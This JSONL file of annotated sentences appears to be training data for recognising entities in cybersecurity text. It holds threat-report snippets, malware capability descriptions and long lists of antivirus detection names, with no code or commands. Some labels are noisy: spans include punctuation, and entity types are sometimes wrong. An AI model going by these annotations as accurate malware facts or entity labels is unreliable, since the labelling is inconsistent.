{"text": "In at least one case, an app used for jailbreaking was available via this third-party app store.", "spans": {"VULNERABILITY: jailbreaking": [[38, 50]], "SYSTEM: third-party app store.": [[74, 96]]}, "info": {"id": "cyner2_train_004333", "source": "cyner2_train"}}
{"text": "FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used Zeon as a loader.", "spans": {"ORGANIZATION: FBI": [[0, 3]], "ORGANIZATION: CISA": [[8, 12]], "MALWARE: variant,": [[26, 34]], "MALWARE: Zeon": [[133, 137]], "MALWARE: loader.": [[143, 150]]}, "info": {"id": "cyner2_train_004334", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.AntiAV.105984 Trojan.Win32.AntiAV!O Trojan.FakeMS.ED Win32.Trojan.ImPatch.a Trojan.KillAV Win32/Gosht.AY Trojan.Win32.PcClient.zvjt Trojan.Win32.AntiAV.105984.B TrojWare.Win32.Magania.~AAD BehavesLike.Win32.Backdoor.ch Trojan/AntiAV.acg Trojan/Win32.AntiAV Trojan:Win32/Scelp.A Trojan/Win32.OnlineGameHack.R1939 Trojan.AntiAV Trj/Redbind.C Backdoor.Win32.Gh0st.g Trojan.AntiAV!x/J77uxYhp4 Backdoor.Win32.FirstInj W32/Farfli.DZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004335", "source": "cyner2_train"}}
{"text": "Linux.MulDrop.14 changes the password on the devices it infects, unpacks and launches a miner, and then, in an infinite loop, starts searching for network nodes with an open port 22.", "spans": {"SYSTEM: devices": [[45, 52]], "MALWARE: miner,": [[88, 94]], "SYSTEM: network nodes": [[147, 160]]}, "info": {"id": "cyner2_train_004336", "source": "cyner2_train"}}
{"text": "Based on the type of targets, on Gaza being the source of the attacks, and on the type of information the attackers are after - we estimate with medium-high certainty that the Hamas terrorist organization is behind these attacks.", "spans": {"THREAT_ACTOR: attackers": [[106, 115]], "THREAT_ACTOR: the Hamas terrorist organization": [[172, 204]]}, "info": {"id": "cyner2_train_004337", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.C713 Adware.KraddareCRTD.Win32.3559 W32/Adware.AKQI HT_KRADDARE_FB150035.UVPM Win.Trojan.Kraddare-257 not-a-virus:Downloader.Win32.Snojan.dvv Trojan.Win32.Dwn.cwejxs Trojan.DownLoader21.62200 HT_KRADDARE_FB150035.UVPM W32/Adware.VBKZ-4259 Variant.Strictor.ij TrojanDownloader:Win32/Kraddare.D Trojan.Strictor.D13BAE not-a-virus:Downloader.Win32.Snojan.dvv Win32.Application.RaonMedia.A Downloader.Snojan Adware.Kraddare!CDLXoCIKpSY Trojan-Downloader.Win32.Kraddare", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004338", "source": "cyner2_train"}}
{"text": "MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast , ensuring that the app 's functionality will be activated every time the device starts Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads The Rotexy mobile Trojan – banker and ransomware 22 NOV 2018 On the back of a surge in Trojan activity , we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub .", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "SYSTEM: Google Play": [[169, 180]], "MALWARE: Rotexy": [[491, 497]], "MALWARE: Asacub": [[708, 714]]}, "info": {"id": "cyner2_train_004340", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Sanhotan Trojan/IRCBot.bh Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Tnega.CTXcdP TROJ_SANHOTAN.SMCC Trojan.Win32.Dwn.cwxrbq TrojWare.MSIL.IRCBot.bh Trojan.DownLoader10.23149 TROJ_SANHOTAN.SMCC Trojan.Msil BDS/MSIL.Sanhotan.A.3 Backdoor:MSIL/Sanhotan.A Trojan.Kazy.D3D12A Trojan/Win32.Strictor.C202516 Trojan.Badur Backdoor.MSIL!V0iyslQUBdw MSIL/IRCBot.AR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004343", "source": "cyner2_train"}}
{"text": "Around 2014, a specific user group of BlackEnergy attackers came to our attention when they began deploying SCADA-related plugins to victims in the ICS and energy sectors around the world.", "spans": {"THREAT_ACTOR: user group": [[24, 34]], "THREAT_ACTOR: BlackEnergy attackers": [[38, 59]], "ORGANIZATION: the ICS": [[144, 151]], "ORGANIZATION: energy sectors": [[156, 170]]}, "info": {"id": "cyner2_train_004344", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.PcClient!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Hacktool.Rootkit Win.Trojan.PcClient-22 Backdoor.Win32.PcClient.qz Troj.W32.Pakes.l3y1 Backdoor.Win32.PcClient.~AB BackDoor.PcClient BackDoor-CKB.sys Backdoor.Win32.PcClient Backdoor/PcShare.uu BDS/Pcclient.hp.1.C Backdoor.Win32.PcClient.qz Trojan/Win32.PcClient.R32879 BackDoor-CKB.sys", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004345", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PSW.Win32.Gip.112 Trojan.PWS.Gip.EJ GIP.Trojan Gip.1_12 Win32.PSW.Gip.112 TrojWare.Win32.PSW.Gip.112 Trojan.PWS.Gip.112 TR/PWStealer.Srv TROJ_GIP.112 Heuristic.BehavesLike.Win32.Downloader.A Win32/PSW.Gip.112 Trojan/PSW.Gip.112 Trojan-PWS.Win32.Gip!IK Backdoor.Win32.GIP.45568 Win-Trojan/Gip.45990 Trojan.PSW.Gip.1_12 Trojan.PWS.Gip.EJ Trojan.PSW.Gip.112 Trojan-PWS.Win32.Gip W32/GIP.112!tr Gip.1_12", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004347", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mezzia.CV Trojan.Mezzia TrojanDropper:Win32/Pakks.A Trojan.Mezzia.CV Worm.Mail.Win32.Zhelatin.hd Dropper.Small.29.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004348", "source": "cyner2_train"}}
{"text": "TrendMicro has recently discovered a Trojan Android ad library called Xavier Detected by Trend Micro as ANDROIDOS_XAVIER.AXM that steals and leaks a user's information silently.", "spans": {"ORGANIZATION: TrendMicro": [[0, 10]], "MALWARE: Trojan Android": [[37, 51]], "MALWARE: Xavier": [[70, 76]], "ORGANIZATION: Trend Micro": [[89, 100]]}, "info": {"id": "cyner2_train_004349", "source": "cyner2_train"}}
{"text": "Recently, we observed a new version of the Clayslide delivery document used to install a new custom Trojan whose developer calls it ALMA Communicator", "spans": {"MALWARE: custom Trojan": [[93, 106]], "MALWARE: ALMA Communicator": [[132, 149]]}, "info": {"id": "cyner2_train_004351", "source": "cyner2_train"}}
{"text": "BernhardPOS is named after presumably it's author who left in the build path of C:\\bernhard\\Debug\\bernhard.pdb and also uses the name Bernhard in creating the mutex OPSEC_BERNHARD", "spans": {"MALWARE: BernhardPOS": [[0, 11]], "THREAT_ACTOR: author": [[43, 49]], "MALWARE: Bernhard": [[134, 142]]}, "info": {"id": "cyner2_train_004353", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Autorun.worm.f Worm.VB.Win32.714 Trojan.Heur.9nKfrjYfrwgib W32/Worm.LUOA-4933 W32.SillyFDC Trojan.Win32.Coba.czqfat Worm.Win32.VB.110592 Win32.Trojan.Fakedoc.Auto BehavesLike.Win32.Trojan.tz Worm.Win32.VB W32/Worm.APSB Worm:Win32/Fakeon.A!bit HEUR/Fakon.mwf W32/ExeFolder.E.worm Worm.VB!Ly8UmpRsepM Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004357", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.AutoIT.7 Win.Trojan.Autoit-271 TR/Spy.438784.57", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004358", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom/W32.GandCrypt.229376.B Trojan.Gandcrypt Troj.Ransom.W32!c Ransom_GandCrypt.R002C0WB618 Win32.Trojan.WisdomEyes.16070401.9500.9998 Ransom_HPGANDCRAB.SMONT Trojan-Ransom.Win32.GandCrypt.bw Trojan.Win32.Kryptik.exorqv TrojWare.Win32.Ransom.GandCrypt.A BehavesLike.Win32.Trojan.dc Trojan/Win32.Magniber.C2395866 Trojan-Ransom.Win32.GandCrypt.bw W32/Injector.DVHR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004359", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Spyware.PasswordStealer Backdoor.Androm.Win32.48978 Uds.Dangerousobject.Multi!c Win32.Trojan.WisdomEyes.16070401.9500.9547 Backdoor.Win32.Androm.oxvy Trojan.Win32.Androm.exigvu Trojan.PWS.Banker1.24888 BehavesLike.Win32.Fareit.ft Trojan.Win32.Injector TR/Dropper.VB.hvcaz Trojan[Backdoor]/Win32.Androm Backdoor.Win32.Androm.oxvy Trojan/Win32.VBKrypt.R218732 Backdoor.Androm Trj/GdSda.A Win32.Backdoor.Androm.Wvaq W32/FareitVB.DVIL!tr Win32/Trojan.5a2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004360", "source": "cyner2_train"}}
{"text": "This rootkit family called Umbreon sharing the same name as the Pokémon targets Linux systems, including systems running both Intel and ARM processors, expanding the scope of this threat to include embedded devices as well.", "spans": {"MALWARE: rootkit family": [[5, 19]], "MALWARE: Umbreon": [[27, 34]], "SYSTEM: Linux systems,": [[80, 94]], "SYSTEM: systems": [[105, 112]], "SYSTEM: Intel": [[126, 131]], "SYSTEM: ARM processors,": [[136, 151]], "MALWARE: threat": [[180, 186]], "SYSTEM: embedded devices": [[198, 214]]}, "info": {"id": "cyner2_train_004361", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Delf!O Backdoor.Ginwui Win32.Trojan-Dropper.Delf.bc W32/Trojan2.JUQE PE_GINWUI.AP Win.Downloader.80081-1 Trojan-Downloader.Win32.Delf.ccc Trojan.Win32.Delf.uhoo Troj.Dropper.W32.Delf.li4k Win32.Trojan-downloader.Delf.Taex Trojan.DownLoad3.11310 Downloader.Delf.Win32.28823 PE_GINWUI.AP BehavesLike.Win32.Kespo.fc W32/Trojan.ZLPI-8330 TrojanDownloader.Delf.fdg TR/Ghimpe.dll Trojan[Downloader]/Win32.Delf Trojan.Graftor.D7EE4 Trojan.Win32.Downloader.54960 Trojan-Downloader.Win32.Delf.ccc Backdoor:Win32/Ginwui.D Trojan/Win32.Xema.R106631 Win32/TrojanDropper.Delf.OCT Trojan.DL.Delf!lmsXQwcGhNs Trojan-Dropper.Win32.Interlac TrojanDownloader.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004363", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Tiltee TrojanDownloader:Win32/Tiltee.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004364", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Superboy Trojan.Vir.HLL Virus.Supeboy.Win32.1 Trojan.Heur.E3C718 TROJ_SUPEBOY.A W32/Superboy.MNPI-1152 TROJ_SUPEBOY.A Win.Trojan.Supeboy-1 Virus.Win32.HLLW.Supeboy Virus.Win32.HLLW.ghqc Trojan.Win32.Downloader.11776.D W32.HLLW.Supeboy!c Win32.HLLW.Supeboy.A W32/Supeboy.worm Trojan/SuperBoy.DelRegBackup W32/HLLW.Supeboy.A Virus/Win32.Supeboy Virus.Win32.HLLW.Supeboy W32/Supeboy.worm Trojan.Worm Win32/HLLW.Supeboy.A Win32.Virus.Hllw.Akeq Win32.HLLW.Supeboy.B Virus.Win32.HLLW Win32/Virus.BO.621", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004365", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AppdataAdobLnrC.Trojan Net-Worm.Win32.Cynic!O Worm.Cynic Worm.Cynic.Win32.96 Win32.Trojan.WisdomEyes.16070401.9500.9997 Net-Worm.Win32.Cynic.iu Trojan.Win32.Bot.crrkzb BackDoor.IRC.Bot.1244 BehavesLike.Win32.Downloader.ct TR/Zbot.var Worm[Net]/Win32.Cynic Worm:Win32/Vexral.A Trojan.Barys.657 Worm.Win32.A.Net-Cynic.95744 Net-Worm.Win32.Cynic.iu Trojan/Win32.IRCBot.R23264 Worm.Cynic Win32/AutoRun.IRCBot.II Trojan.Injector!y7pxtOpaO3Y Net-Worm.Win32.Cynic W32/Injector.HXK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004368", "source": "cyner2_train"}}
{"text": "Like several of the newer variants of ransomware, it does not require an internet connection to encrypt the files.", "spans": {}, "info": {"id": "cyner2_train_004369", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.QQLogger.236036.B TrojanPWS.QQthief.BI4 Trojan/Spy.QQLogger.aby Trojan.Win32.QQLogger.bdqigk Phisher.CZ Trojan.Spy-85326 Trojan-Spy.Win32.QQLogger.ado TrojanSpy.QQLogger!0FayLe3uYlk Trojan.PWS.Qqpass.6867 TrojanSpy.QQLogger.ct Win32.Troj.QQLogger.kcloud PWS:Win32/QQThief.I Spyware/Win32.QQLogger Virus.Win32.Part.a TrojanSpy.QQLogger Trojan.PSW.Win32.QQThief.j Trojan-Spy.Win32.QQLogger W32/QQLogger.CDX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004371", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropped:Backdoor.BlueFire.0.5.0 Backdoor/W32.BlueFire.593408 Backdoor.Bluefire Backdoor/BlueFire.036 BKDR_BLUEFIRE.A W32/Risk.VCME-1818 Construction.Kit BKDR_BLUEFIRE.A Win.Trojan.Bluefire-5 Backdoor.Win32.BlueFire.036 Dropped:Backdoor.BlueFire.0.5.0 Trojan.Win32.BlueFire.gaiw Backdoor.W32.BlueFire.036!c Dropped:Backdoor.BlueFire.0.5.0 Backdoor.Win32.BlueFire.036 Dropped:Backdoor.BlueFire.0.5.0 BackDoor.BlueFire.36 Backdoor.BlueFire.Win32.12 Backdoor/BlueFire.036 W32.Trojan.Backdoor-BlueFire BDS/BlueFire.50.DLL Trojan[Backdoor]/Win32.BlueFire Backdoor.BlueFire.0.5.0 Backdoor.Win32.BlueFire.036 Backdoor:Win32/BlueFire.0_36 Trojan/Win32.BlueFire.R61616 Dropped:Backdoor.BlueFire.0.5.0 Backdoor.BlueFire Win32/BlueFire.036 Win32.Backdoor.Bluefire.Tayj Backdoor.BlueFire!vtgAlnbXp+8 Backdoor.Win32.Way W32/Bdoor.UZ!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004372", "source": "cyner2_train"}}
{"text": "However, the attack is different in two respects: unlike other APTs, the main focus of Blue Termite is to attack Japanese organizations; and most of their C2s are located in Japan.", "spans": {"THREAT_ACTOR: APTs,": [[63, 68]], "THREAT_ACTOR: Blue Termite": [[87, 99]], "ORGANIZATION: Japanese organizations;": [[113, 136]], "SYSTEM: C2s": [[155, 158]]}, "info": {"id": "cyner2_train_004375", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.ED Dropper.Binder.Win32.1016 Trojan/Dropper.Binder.qd Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/DropperX.VWP Trojan.Crypt.ED Backdoor.Win32.Rbot.abwp Trojan.Crypt.ED Trojan.Crypt.ED BackDoor.Shell BehavesLike.Win32.Backdoor.bh W32/Risk.ZNPN-3988 TrojanDropper.Binder.ht Trojan.Crypt.ED Backdoor.Win32.Rbot.abwp Backdoor:Win32/Blackhole.U Backdoor/Win32.Hupigon.R7788 Trojan.Crypt.ED Backdoor.Shell", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004377", "source": "cyner2_train"}}
{"text": "A subsequent investigation revealed that the spyware has the following capabilities : Records every phone call ( literally the conversation as a media file ) , then sends it together with the caller id to the C & C ( incall3.php and outcall3.php ) Logs every incoming SMS message ( SMS body and SMS sender ) to C & C ( script3.php ) Has capability to hide self Can send all call logs ( “ content : //call_log/calls ” , info : callname , callnum , calldate , calltype , callduration ) to C & C ( calllog.php ) Whenever the user snaps a picture , either with the front or rear camera , it gets sent to the C & C ( uppc.php , fi npic.php orreqpic.php ) Can send GPS coordinates to C & C ( gps3.php ) The C & C server to which the application seems to be sending collected data appears to be operational , as of this writing , and running since May 2018 .", "spans": {"SYSTEM: GPS": [[659, 662]]}, "info": {"id": "cyner2_train_004379", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Trojan.Crypt.52 TSPY_EMOTET.SMD3 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_EMOTET.SMD3 Trojan.Win32.Diple.euwotz TrojWare.Win32.Crypt.AX BehavesLike.Win32.Ramnit.dc W32.Trojan.Emotet Trojan:Win32/Diple.B!bit Trojan/Win32.Magniber.R212688 Trojan.Win32.VB Win32/Trojan.d4d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004380", "source": "cyner2_train"}}
{"text": "Windows and winzip do not natively extract them which delivers some malware.", "spans": {"SYSTEM: Windows": [[0, 7]], "SYSTEM: winzip": [[12, 18]], "MALWARE: malware.": [[68, 76]]}, "info": {"id": "cyner2_train_004382", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Halk!O Backdoor.CIA BKDR_NERTE.780 Backdoor.Win32.NerTe.780 Backdoor.Win32.Nerte_780.Inst[h] Backdoor.Win32.NerTe.780 Trojan.MulDrop.1253 BKDR_NERTE.780 W32/Risk.YHOK-6554 BDS/Nerte78.Inst Win32.Hack.NerteZip.kcloud Backdoor:Win32/Nerte.7_80.dr Bck/Iroffer.BG Win32/NerTe.78.Client W32/NerTe.V780!tr.bdr BackDoor.Nerte Backdoor.Win32.NerTe.ajn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004383", "source": "cyner2_train"}}
{"text": "These campaigns have lead to a rapid rise in the rate of Bedep infections, with Arbour Networks observing just above 80K infections over a 3-day period.", "spans": {"THREAT_ACTOR: These campaigns": [[0, 15]], "MALWARE: Bedep": [[57, 62]], "SYSTEM: Arbour Networks": [[80, 95]]}, "info": {"id": "cyner2_train_004384", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.TrojanSpy.Banker.ahy.f W32/Packed_Upack.H Trojan-Banker.Win32.Banker.etk Packed.Win32.UPack Trojan.PWS.Banker.based Trojan-Banker.Win32.Banbra!IK Trojan-Banker.Win32.Banbra PSW.Banker Trj/Banker.ITS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004385", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HostsMsasc.Trojan Trojan.Win32.Inject!O Trojan.Zusy.D7CC Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_PAM_000002012C.T3 Win.Trojan.Inject-7728 Trojan.Win32.Inject.dcduro Trojan.Win32.A.Llac.419328 Trojan.MulDrop3.3872 Trojan.Injector.Win32.50089 Trojan-Spy.MSIL TrojanDropper.Injector.kgt TR/Jorik.AC Trojan/Win32.Shakblades TrojanSpy:MSIL/VB.M Trojan/Win32.Jorik.C97808 Worm.Shakblades Worm.Ainslot!/rTzgf3sAsw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004386", "source": "cyner2_train"}}
{"text": "On July 16, 2015, the Palo Alto Networks Unit 42 threat intelligence team discovered a watering hole attack on the website of a well-known aerospace firm.", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42 threat intelligence team": [[22, 73]], "ORGANIZATION: aerospace firm.": [[139, 154]]}, "info": {"id": "cyner2_train_004388", "source": "cyner2_train"}}
{"text": "MalumPoS was designed to be configurable.", "spans": {"MALWARE: MalumPoS": [[0, 8]]}, "info": {"id": "cyner2_train_004389", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virtool.8944 Server-Proxy.Win32.CCProxy!O W32/HackTool.CYA not-a-virus:Server-Proxy.Win32.CCProxy.63 Virtool.8944 Riskware.Win32.CCProxy.ybka Virtool.8944 Win32.ServerProxy.CCProxy.~BAAB Program.CCProxy W32/Tool.YSPN-2643 AdWare/CCProxy.b GrayWare[Server-Proxy]/Win32.CCProxy HackTool:Win32/CCProxy.B Virtool.D22F0 not-a-virus:Server-Proxy.Win32.CCProxy.63 Virtool.8944 Win-AppCare/Ccproxy.987136 Virtool.8944 not-a-virus:Server-Proxy.Win32.CCProxy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004390", "source": "cyner2_train"}}
{"text": "The source and destination addresses are both blank without an actual email address.", "spans": {}, "info": {"id": "cyner2_train_004391", "source": "cyner2_train"}}
{"text": "Unit 42 also tracks the APT3 group using the name UPS, which is an intrusion set with Chinese origins that is known for having early access to zero-day vulnerabilities and delivering a backdoor called Pirpi.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: APT3 group": [[24, 34]], "THREAT_ACTOR: UPS,": [[50, 54]], "VULNERABILITY: zero-day vulnerabilities": [[143, 167]], "MALWARE: backdoor": [[185, 193]], "MALWARE: Pirpi.": [[201, 207]]}, "info": {"id": "cyner2_train_004394", "source": "cyner2_train"}}
{"text": "Most security vendors fail to identify the malicious code 7/55 on virustotal", "spans": {"ORGANIZATION: security vendors": [[5, 21]], "MALWARE: malicious code": [[43, 57]], "ORGANIZATION: virustotal": [[66, 76]]}, "info": {"id": "cyner2_train_004395", "source": "cyner2_train"}}
{"text": "VBS malware, likely deployed as part of a red team", "spans": {"MALWARE: VBS malware,": [[0, 12]], "THREAT_ACTOR: a red team": [[40, 50]]}, "info": {"id": "cyner2_train_004396", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesMSIMOB.Trojan Worm.Win32.FakeFolder!O Trojan.Fakefolder.C4 Worm.FakeFolder.Win32.23 W32/FakeFolder.ADPV-1915 W32.SillyFDC Win32/SillyAutorun.FIA TSPY_FAKEALERT_BH010146.TOMC Win.Trojan.Fakefolder-76 Worm.Win32.FakeFolder.a Worm.Win32.A.FakeFolder.26624[UPX] TSPY_FAKEALERT_BH010146.TOMC BehavesLike.Win32.PWSBanker.tc Trojan.Win32.Fakefolder W32/FakeFolder.A Worm/FakeFolder.b Worm/Win32.FakeFolder Trojan:Win32/Fakefolder.C Worm.Win32.FakeFolder.a Trojan/Win32.FakeFolder.R143433 Worm.FakeFolder Win32.Worm.Fakefolder.Wmim Worm.FakeFolder!qDF5E1Kz9pU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004398", "source": "cyner2_train"}}
{"text": "Similar to previous attacks, the Disttrack malware used by Shamoon is just the destructive payload.", "spans": {"MALWARE: Disttrack malware": [[33, 50]], "THREAT_ACTOR: Shamoon": [[59, 66]], "MALWARE: the destructive payload.": [[75, 99]]}, "info": {"id": "cyner2_train_004399", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TjnClicker.Qaccel.S1448 Trojan.Small.Win32.31852 Trojan/Clicker.Small.ndn Trojan.Win32.Click3.erajhs TrojWare.Win32.TrojanClicker.Small.DS Trojan.Click3.21941 TR/Dropper.tstkm GrayWare[AdWare]/Win32.TrojanClicker.Small.ndn Trojan/Win32.Dynamer.R187373 Backdoor.Bot Trojan.Win32.TrojanClicker", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004400", "source": "cyner2_train"}}
{"text": "A macOS malware agent, named MacDownloader, was observed in the wild as targeting the defense industrial base, and reported elsewhere to have been used against an human rights advocate.", "spans": {"SYSTEM: macOS": [[2, 7]], "MALWARE: malware agent,": [[8, 22]], "MALWARE: MacDownloader,": [[29, 43]], "ORGANIZATION: defense industrial base,": [[86, 110]], "ORGANIZATION: an human rights advocate.": [[160, 185]]}, "info": {"id": "cyner2_train_004405", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod740.Trojan.4797 Backdoor.Bittaru!1goVteZqWDk TROJ_SPNR.15KL11 MalCrypt.Indus! BDS/Bittaru.A.4 TROJ_SPNR.15KL11 Win32.Troj.Undef.kcloud Backdoor:Win32/Bittaru.A W32/Trojan.PAFV-2148 W32/BackDoor.DPM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004407", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.Disfa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004408", "source": "cyner2_train"}}
{"text": "A backdoor also known as: MemScan:Trojan.Glitch.A Trojan-Dropper.Win32.Juntador!O MemScan:Trojan.Glitch.A Trojan/Dropper.Juntador.c Trojan.Glitch.A W32/Dropper.ATCT Backdoor.IRC.Zcrew TROJ_JUNTADOR.C Win.Dropper.Juntador-12 MemScan:Trojan.Glitch.A Trojan-Dropper.Win32.Delf.hq MemScan:Trojan.Glitch.A Trojan.Win32.Juntador.diov MemScan:Trojan.Glitch.A TrojWare.Win32.TrojanDropper.Juntador.c0 MemScan:Trojan.Glitch.A BackDoor.DMoon Dropper.Juntador.Win32.230 TROJ_JUNTADOR.C BehavesLike.Win32.Dropper.hc W32/Risk.HJDZ-9373 TrojanDropper.Win32.Juntador.c TrojanDropper:Win32/Juntador.C Trojan-Dropper.Win32.Delf.hq Trojan/Win32.LdPinch.C10075 Win32/TrojanDropper.Juntador.C Win32.Trojan-dropper.Delf.Eegz Trojan-Dropper.Win32.Juntador.C Win32/Trojan.bf1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004409", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Script.Application.CdEject.A Script.Application.Cdeject!c BehavesLike.Win32.PUPXBC.dc Joke:VBS/CDEject.D PUP.Linkury/Variant Trojan.Ejectcd.A VBS/CDEject.I Backdoor.MSIL.Bladabindi VBS/CDEject.I!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004411", "source": "cyner2_train"}}
{"text": "Symantec has identified a previously unknown group called Sowbug that has been conducting highly targeted cyber attacks against organizations in South America and Southeast Asia and appears to be heavily focused on foreign policy institutions and diplomatic targets.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: unknown group": [[37, 50]], "THREAT_ACTOR: Sowbug": [[58, 64]], "ORGANIZATION: organizations": [[128, 141]], "ORGANIZATION: foreign policy institutions": [[215, 242]], "ORGANIZATION: diplomatic targets.": [[247, 266]]}, "info": {"id": "cyner2_train_004412", "source": "cyner2_train"}}
{"text": "This disabled the attacker's access to their victims in this campaign, provided further insight into the targets currently victimized in this operation, and enabled the notification of affected parties.", "spans": {"THREAT_ACTOR: attacker's": [[18, 28]], "THREAT_ACTOR: campaign,": [[61, 70]], "THREAT_ACTOR: operation,": [[142, 152]]}, "info": {"id": "cyner2_train_004413", "source": "cyner2_train"}}
{"text": "Finally, Doctor Web's security researchers investigated the Linux.Mirai Trojan found later that month.", "spans": {"ORGANIZATION: Doctor Web's security researchers": [[9, 42]], "MALWARE: Trojan": [[72, 78]]}, "info": {"id": "cyner2_train_004417", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32.Sality!O Backdoor.Poison.Win32.26527 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.VBKrypt.hjcg Trojan.Win32.VB.dodqqz Troj.W32.VBKrypt.hjcg!c Trojan.MulDrop2.20812 Backdoor/Poison.eqy Trojan/Win32.VBKrypt TrojanDownloader:Win32/Tyqui.B Trojan.Win32.VBKrypt.hjcg Trj/CI.A Win32/TrojanDownloader.VB.ODM Trojan.VBKrypt!ngQI4PCHe4I Backdoor.Poison W32/Dx.TQG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004418", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PERL/Shellbot.B Backdoor.Perl.Shellbot.B Perl/Shellbot.PR Perl.Backdoor.Shellbot.f Unix/ShellBot.AH IRC.Backdoor.Trojan Perl/Shellbot.NAI PERL_SHELBOT.SMO Win.Trojan.Perlbot-1 Backdoor.Perl.IRCBot.ij Backdoor.Perl.Shellbot.B Backdoor.Perl.Ircbot!c Perl.Backdoor.Ircbot.Akpo Backdoor.Perl.Shellbot.B Backdoor.Perl.Shellbot.B Perl.Ircbot.93 PERL_SHELBOT.SMO Unix/ShellBot.AH PERL/Shellbot.aa Perl/IRCBot.I!tr Backdoor.Perl.Shellbot.B Backdoor.Perl.IRCBot.ij Backdoor:Perl/Shellbot.Z Backdoor.Perl.Shellbot.B Perl.Shellbot.I Trojan.Perl.Shellbot Backdoor.Perl.Shellbot.B Win32/Trojan.BO.811", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004420", "source": "cyner2_train"}}
